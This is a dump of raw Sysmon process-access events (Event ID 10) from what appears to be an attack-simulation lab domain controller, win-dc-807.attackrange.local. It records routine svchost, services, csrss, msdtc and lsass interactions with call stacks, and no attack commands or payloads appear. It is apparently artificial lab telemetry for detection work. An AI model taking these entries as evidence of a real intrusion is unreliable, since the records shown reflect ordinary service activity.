15:53:21.606{D28789B6-7C64-5FA1-1400-000000008801}13121400C:\Windows\System32\svchost.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006433Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.559{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.559{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006431Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:21.559{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006482Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.638{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006481Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.638{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006480Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.638{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006479Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.591{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006478Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.591{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.591{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006476Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.591{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006475Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.591{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006474Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.591{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006473Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.576{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006472Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.576{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006471Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.576{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006470Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.278{D28789B6-7C62-5FA1-0A00-000000008801}852948C:\Windows\system32\services.exe{D28789B6-7CF2-5FA1-6501-000000008801}3920C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006469Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.278{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CF2-5FA1-6501-000000008801}3920C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006468Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.200{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CF2-5FA1-6501-000000008801}3920C:\Windows\system32\sppsvc.exe0x103800C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006467Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.200{D28789B6-7C62-5FA1-0A00-000000008801}8522484C:\Windows\system32\services.exe{D28789B6-7CF2-5FA1-6501-000000008801}3920C:\Windows\system32\sppsvc.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006466Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.138{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006465Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.138{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006464Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.138{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006463Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.059{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CF1-5FA1-6401-000000008801}4028C:\Windows\System32\msdtc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:22.059{D28789B6-7C62-5FA1-0B00-000000008801}8684780C:\Windows\system32\lsass.exe{D28789B6-7CF1-5FA1-6401-000000008801}4028C:\Windows\System32\msdtc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006461Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 